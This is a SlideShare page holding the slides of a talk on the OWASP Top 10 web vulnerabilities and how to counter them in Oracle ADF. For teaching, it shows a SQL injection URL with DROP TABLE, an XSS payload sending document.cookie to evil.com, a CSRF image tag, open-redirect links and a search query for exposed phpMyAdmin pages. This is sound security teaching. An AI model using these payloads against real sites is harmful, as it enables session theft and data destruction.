Integrating ADF Mobile with WebCenterBrian Huff
 
WebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case StudiesWebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case StudiesBrian Huff
 
Creating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsCreating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsBrian Huff
 
FatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersFatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersBrian Huff
 
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion MiddlewareCreating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion MiddlewareBrian Huff
 
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...Brian Huff
 
Creating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized WebsiteCreating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized WebsiteBrian Huff
 
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogicThe Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogicBrian Huff
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesBrian Huff
 
Oracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance TuningOracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance TuningBrian Huff
 
Real World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management StrategiesReal World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management StrategiesBrian Huff
 
A Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content ManagementA Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content ManagementBrian Huff
 
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)Brian Huff
 
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)Brian Huff
 
Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!Brian Huff
 

Mehr von Brian Huff (19)

Top 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud DevelopersTop 10 HTML5 Features for Oracle Cloud Developers
Top 10 HTML5 Features for Oracle Cloud Developers
 
Switching to Oracle Document Cloud
Switching to Oracle Document CloudSwitching to Oracle Document Cloud
Switching to Oracle Document Cloud
 
AP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenterAP Automation for EBS or PeopleSoft with Oracle WebCenter
AP Automation for EBS or PeopleSoft with Oracle WebCenter
 
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
Seamless Integrations between WebCenter Content, Site Studio, and WebCenter S...
 
Integrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenterIntegrating ADF Mobile with WebCenter
Integrating ADF Mobile with WebCenter
 
WebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case StudiesWebCenter Content & Portal Methodology Deep Dive with Case Studies
WebCenter Content & Portal Methodology Deep Dive with Case Studies
 
Creating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile ApplicationsCreating Next-Generation ADF Mobile Applications
Creating Next-Generation ADF Mobile Applications
 
FatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio DevelopersFatWire Tutorial For Site Studio Developers
FatWire Tutorial For Site Studio Developers
 
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion MiddlewareCreating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
Creating a Global E-Commerce Website With E-Business Suite and Fusion Middleware
 
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
Integrating ECM (WebCenter Content) with your Enterprise! 5 Tips to Try, 5 Tr...
 
Creating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized WebsiteCreating and Maintaining An Internationalized Website
Creating and Maintaining An Internationalized Website
 
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogicThe Top 10 Things Oracle UCM Users Need To Know About WebLogic
The Top 10 Things Oracle UCM Users Need To Know About WebLogic
 
Oracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best PracticesOracle UCM Security: Challenges and Best Practices
Oracle UCM Security: Challenges and Best Practices
 
Oracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance TuningOracle UCM: Web Site Performance Tuning
Oracle UCM: Web Site Performance Tuning
 
Real World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management StrategiesReal World Examples of Succesful Enterprise Content Management Strategies
Real World Examples of Succesful Enterprise Content Management Strategies
 
A Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content ManagementA Pragmatic Strategy for Oracle Enterprise Content Management
A Pragmatic Strategy for Oracle Enterprise Content Management
 
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
Top 10 Ways To Integrate With Oracle Enterprise Content Management (ECM)
 
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
A Pragmatic Strategy for Oracle Enterprise Content Management (ECM)
 
Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!Enterprise 2.0: What it is, and how you'll fail!
Enterprise 2.0: What it is, and how you'll fail!
 

Kürzlich hochgeladen

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenHervé Boutemy
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationSafe Software
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfRankYa
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebUiPathCommunity
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxhariprasad279825
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticscarlostorres15106
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024Stephanie Beckett
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...Fwdays
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsSergiu Bodiu
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostZilliz
 

Kürzlich hochgeladen (20)

My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Search Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdfSearch Engine Optimization SEO PDF for 2024.pdf
Search Engine Optimization SEO PDF for 2024.pdf
 
Dev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio WebDev Dives: Streamline document processing with UiPath Studio Web
Dev Dives: Streamline document processing with UiPath Studio Web
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
Artificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptxArtificial intelligence in cctv survelliance.pptx
Artificial intelligence in cctv survelliance.pptx
 
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmaticsKotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
Kotlin Multiplatform & Compose Multiplatform - Starter kit for pragmatics
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks..."LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
"LLMs for Python Engineers: Advanced Data Analysis and Semantic Kernel",Oleks...
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
DevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platformsDevEX - reference for building teams, processes, and platforms
DevEX - reference for building teams, processes, and platforms
 
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage CostLeverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
Leverage Zilliz Serverless - Up to 50X Saving for Your Vector Storage Cost
 

OWASP Top 10 Security Vulnerabilities, and Securing them with Oracle ADF

  • 1. Top 10 Web Vulnerabilities, and Securing them with ADF Brian “Bex” Huff Chief Software Architect
  • 2. 2 Agenda  Intro  Open Web Application Security Project (OWASP)  Top 10 Web Application Security Vulnerabilities  Countermeasures  References  For the latest version of this presentation, go to SlideShare:  http://slideshare.com/bexmex
  • 3. Intro  What is OWASP? • http://owasp.org • Worldwide non-profit focused on improving software security • Reaches out to ALL developers: not just security professionals  Who am I? • Oracle ACE Director • Author of 2 books on Oracle Technology • Twitter: @bex  What will you learn? • The top 10 security mistakes that developers make • How to design software with an assurance of security • You don’t need to be a security guru to secure your web apps 3
  • 4. OWASP Top 10 of 2013 1) Injection 2) Broken Authentication and Session Management 3) Cross Site Scripting 4) Insecure Direct Object References 5) Security Misconfiguration 6) Sensitive Data Exposure (NEW) 7) Missing Function Level Access Control (NEW) 8) Cross Site Request Forgery (CSRF) 9) Using Components with Known Vulnerabilities (NEW) 10) Unvalidated Redirects and Forwards 4
  • 5. 1) Injection  Used when your app sends user-supplied data to other apps • Database, Operating System, LDAP, Web Services  Hackers "inject" their code to run instead of yours • To access unauthorized data, or completely take over remote application  Example: SQL injection attack • String query = "SELECT * FROM products WHERE name='" + request.getParameter("id") +"'";  Code expects a nice parameter in the URL • http://example.com/products?id=123  Hackers could pass this into the URL instead • http://example.com/products?id=';+DROP+TABLE+'products'; 5
  • 6. Example  Don’t: name your child Robert’); DROP TABLE Students;--  Do: expect SQL Injection 6
  • 7. Countermeasures  "Connections" between systems are highly vulnerable  Always assume data coming in could be "evil" • Be sure to include "evil" use cases and user stories in your design  Ideally, only allow the user to select among "safe" options • Never allow them to pass data between systems unchecked  If user-input text is needed, use parameterized statements • Clean up quotes, parenthesis, and comments  Use a battle-tested library for protecting your database • ADF prepared statements, OWASP's ESAPI codecs 7
  • 8. Example // good idea ViewObject studentVO = this.getStudentView(); studentVO.setNamedWhereClauseParam("id", id); // bad idea! ViewObject studentVO = this.getStudentView(); studentVO.setWhereClause("id = " + id); // another bad idea! String query = "select * from students where id=" + id; ViewObject vo = appMod.createViewObjectFromQueryStmt(null,query); 8
  • 9. ADF Input Validation  Occurs on most components automatically • Additional validate components available for additional filtering • validateLength, validateLongRange, convertDateTime, etc.  Exception: when immediate=true for some components • Can access raw, unfiltered data through managed bean  Hidden fields do not equal secure fields • Expect hackers to tamper with the HTML, and insert their own values • selectOne and selectMany do automatic validation, and are safe  Use caution with custom AJAX layers • Not always subject to ADF input validation 9
  • 10. 2) Broken Authentication and Session Management  HTTP is a "stateless" protocol • Nice and simple: HTTP request, HTTP response • All data must be passed in the request every time  How do we store state? • Client side with cookies • Server side with sessions  Most apps place a "sessionId" in cookies, or in the URL • Problem: now stealing sessionIds is just as good as stealing passwords!  Multiple ways to determine a session ID • packet sniffing -- especially on an open WiFi access point • HttpReferrer logs, if sessionId is in the URL 10
  • 11. Countermeasures  Assume that a user stole a session ID • Determine how bad this would be in your application  Use SSL everywhere! • Makes it harder for people to “sniff” your session ID  If you cannot use SSL everywhere, use it for logins • Have a cryptographically strong session ID (ADF default) • Have a reasonable timeout, one hour is fine 11
  • 12. ADF Countermeasures  Don’t pass the jsessionid in the URL, put it in a cookie • Evil sites can sniff your session ID from their referrer logs • Cookies harder to sniff if SSL is enabled  Sample web.xml snippet <session-descriptor> <cookie-name>MYAPPSESSID</cookie-name> <url-rewriting-enabled>false</url-rewriting-enabled> <timeout-secs>3600</timeout-secs> </session-descriptor> 12
  • 13. 3) Cross Site Scripting (XSS)  Sites must "cleanse" user input before displaying it • HTML tags can be very dangerous • If a user can embed a <SCRIPT> tag, all is lost!  Hackers can create URLs to inject their own HTML onto the page • Can be used to do almost any kind of attack!!!  ADF is mostly safe, but occasionally vulnerable • User generated content is usually HTML encoded on the page • <script> becomes &lt;script&gt; • Use caution with the af:resource or f:verbatim tags • Never pass in unencoded data! 13
  • 14. Example  Example: JSP to draw HTML based on user input • String html = "<input name='item' type='TEXT' value='" + request.getParameter("item") + "'>";  Code expects a nice URL: • http://example.com/buy?item=123  But a hacker could supply this URL: • http://example.com/buy?item='><script>document.location=' http://evil.com/steal/'+document.cookie</script>  Then trick an administrator or superuser to go there • Cookie is stolen, and now evil user can connect as the admin! 14
  • 15. Countermeasures  Never, ever, ever trust user-submitted content!  Properly "escape" any data before displaying it on web pages • JavaScript parameters, URL parameters, STYLE elements • Remove script tags, and possibly anything with a SRC attribute • Done automatically in ADF, but manually if you bypass ADF and write JS • Use ESAPI to "cleanse" HTML before dumping to page  Do not allow state-change from HTTP GET requests • Otherwise, a rogue IMG tag could delete content • No state change on initial ADF page load!  Set the HttpOnly flag in your response headers • Prevents document.cookie from working in JavaScript 15
  • 16. 4) Insecure Direct Object Reference  Assume my project id is 123  I see a link on “My Projects” page that goes here: • http://example.com/projects/123  If I alter the URL, can I see other people’s projects? • http://example.com/projects/124  Do you only restrict access in the web form?  What if I could "guess" the URL? Could I see the page? • Don't trick yourself into thinking complex URLs are any more secure • Security != Obscurity 16
  • 17. Countermeasures  Every resource needs a security level • What roles do you need to access certain items? • Access Control Lists are easy to implement, but don’t always scale  All access to that resource should go through the same check • What action are you taking, with what resource? • Put it all in one common codebase for simplicity • May need to run check multiple times, for sub-actions and sub-resources • Unusual behavior? Have additional authentication questions/layers!  Front-end restriction is nice for usability, but not security  Ideally, put all security in the Application Module (model) • Single location to secure multiple views 17
  • 18. Countermeasures, ctd.  Avoid direct object reference • Use a temporary variable relevant to just that user • Use a cryptographically strong variable  Validate all references, regardless  Validate access to that reference • Read, write, update, delete 18
  • 19. ADF Global Security Expressions #{securityContext.authenticated} #{securityContext.userName} #{securityContext.userInRole['roleList']} #{securityContext.userInAllRoles['roleList']} #{securityContext.taskflowViewable['target']} #{securityContext.regionViewable['target']} #{securityContext.userGrantedResource['permission']} #{securityContext.userGrantedPermission['permission']} 19
  • 20. 5) Security Misconfiguration  Everything from the OS to the DB to the ADF framework  What if ADF issued a security patch? • Do you have a centralized policy for keeping dependencies up-to-date? • How long would it take you to discover new code? • How long would it take to recompile/test/redeploy?  Do you know all security configurations in the framework? • Odds are no... documentation is usually obtuse • “Being helpful is a security hole”  Have you properly "hardened" your infrastrurcture? • Delete default users, disable unused services and ports • Operating System, WebLogic, Database, MDS 20
  • 21. Countermeasures  Subscribe to newsletters and blog feeds to get patches • Use automation if possible to verify patches  Do periodic scans to detect misconfiguration / missing patches  Disable ports/services/features unused in production  Disable default users and passwords  Never send stack traces or SQL errors directly to end users  Taking over websites shouldn't be this easy: • http://www.google.com/search? q=inurl:SELECT+inurl:FROM+inurl:WHERE+intitle:phpmyadmin 21
  • 22. 6) Sensitive Data Exposure  All applications store sensitive data • Credit cards, passwords, private health/financial documents  Where does this data get stored? • Database, files, logs, backups, etc.  Where does this data get sent? • Over the web, backup databases, partners, internal emails • JMS queue, web service calls  How are you preventing unauthorized access to all these resources? 22
  • 23. Storage Layer Countermeasures  If you store secrets, encrypt them! • Use only battle-tested standard encryption algorithms  Analyze possible threats: inside attack, external user • Make sure encryption policy is appropriate for the threats  Encrypt data anywhere it's stored long term • Especially backups! • Store backups of decryption keys separately from data  Restrict access to decrypted data to only authorized users  Hash all passwords with a standard algorithm, and a "salt"  Use strong keys to access the information  Create a password management policy, and stick with it! 23
  • 24. Sane Pass Phrase Management Policy 24
  • 25. Transport Layer Countermeasures  Use strong, standards compliant network security protocols • Use TLS (SSL) on all connections with sensitive data  Encrypt messages before transmission • XML-Encryption  Sign messages before transmission • XML-Signature  Disable old, flawed encryption algorithms (ie, SSL 2.0) 25
  • 26. 7) Missing Function Level Access Control  Similar to Insecure Direct Object Reference • Need to block specific actions, even if no resource is identified  Example: my project is 123  I will see these URLs on my home page: • http://example.com/project/123 • http://example.com/user/getProjects/  I could fish around and try other URLs as well: • http://example.com/manager/getProjects/ • http://example.com/admin/getProjects/  Would your application prevent this?  Same general issue: • you have front-end security, but not back-end security 26
  • 27. Countermeasures  Do authentication checks at least twice • Front end UI, and back end Controller  Don't draw URLs to the page if the user cannot access them • Bad usability • Hackers might be tempted to fish around for vulnerabilities  Never assume a URL is allowed • Do back-end checks for access, and state change  Add even more layers as needed: • Does all security information exist in the URL? • Can you authenticate right away? • Might you need to get half way through the request before you know what rights are needed? • What if the user has access, but their behavior is unusual • should you prompt for password again, or perhaps for additional authorization? 27
  • 28. 8) Cross-Site Request Forgery  Evil sites can hijack your browser, and run secure requests: 1) User logs into secure application behind the firewall http://example.com/myApp 1) User goes to "evil" website, or loads up "evil" HTML email 2) HTML contains this image: <img src="http://example.com/myApp/deleteEverything"></img>  With JavaScript and XSS, evil sites can completely take over your browser • Can browse around your intranet, log into bank accounts • Anything you are currently logged into • Complete control, as long as you stay on the evil site  Unfortunate side-effect of Single-Sign-On 28
  • 29. Countermeasures  Need a unique token to validate that the request is authentic • The jsessionId is sometimes sufficient, but can be stolen with XSS • More secure: unique token for every HTTP request • If somebody steals your jsessionid, they can only do one request!  Steps to validate every request • Put a random number in the session for the next valid token • Put that token on every HTML web form that causes state change • When processing a request, validate the token • Generate another random token for the next request • Place that token in the session, repeat forever! • NOTE: might not be needed in JSF 2.1  http://blog.eisele.net/2011/02/preventing-csrf-with-jsf-20.html 29
  • 30. 9) Using Components with Known Vulnerabilities  In addition to ADF, you may use other frameworks • Open Source Libraries • OEM Libraries • JavaScript frameworks • JARs and JARs and JARs of fun...  Automated hacker tools can find these dependencies • Unless you are always on the latest stable version, you are vulnerable  All possible attack vectors are open • XSS, injection, CDRF being the most common and most troublesome • Rages from annoying to complete takeover of your servers 30
  • 31. Countermeasures  At a minimum, manually keep track of dependencies/versions • Developers must justify every JAR they depend on • Must manually keep track of version, and check before each release  Better still, use Maven to perform automated builds • Automatically check your JAR version vs. latest stable release  Both have risks to the build process • What if you have to refactor your code every time the JAR is revised? • Annoying, but a neccessary step to secure your applications 31
  • 32. 10) Unvalidated Redirects and Forwards  Most sites allow redirects to other sites, or pages within the site: • http://example.com/redirect?url=google.com  But, open redirect pages can be used by "phishers" to create links to their site: • http://example.com/redirect?url=evil.com  Link looks like it goes to "example.com", but it goes to "evil.com"  Or, can trick a site user into harming their own site: • http://example.com/redirect?url=/admin.jsp?deleteEverything=true  Sometimes called "phishing holes" 32
  • 33. ADF Attack Vectors  Common places to do redirects • PagePhaseListener • Download Servlet • Task Flow router  Example code for a redirect: FacesContext fctx = FacesContext.getCurrentInstance(); fctx.getExternalContext().redirect("http://google.com"); 33
  • 34. Countermeasures  Restrict redirects to a limited number of "trusted" sites  Keep a list of all redirect URLs, and pass the ID in the request, instead of the URL • http://example.com/redirect?urlId=123  Hash the URL with a secret, and pass the hash in the URL • http://example.com/redirect?url=google.com&hash=a1b2c3  Example: does this URL look like a Google Invoice to you? • http://www.google.com/#invoiceId=123&q=oHg5SJYRHA0&btnI=3564  Question: are URL shorteners inherently unsafe? • TinyUrl offers a "preview" feature: others should as well 34
  • 35. References  OWASP top 10, and associated resources • https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project  ADF Code guidelines to prevent security holes: • http://www.oracle.com/technetwork/developer-tools/adf/learnmore/adf- code-guidelines-v1-00-1845659.pdf  JavaScript best practices for ADF • http://www.oracle.com/technetwork/developer-tools/jdev/1-2011-javascript- 302460.pdf  Hardening Fusion Middleware to avoid OWASP issues: • http://antonfroehlich.blogspot.com/2012/06/handling-owasp-top-ten- application.html  JSF and OWASP • http://turbomanage.files.wordpress.com/2009/10/securing-jsf-applications- against-owasp-top-ten-color.pdf 35
  • 36. 36  My Company: http://bezzotech.com  My Blog: http://bexhuff.com  My Slides: http://slideshare.com/bexmex  My Tweets: @bex  My Self: bex@bezzotech.com Questions?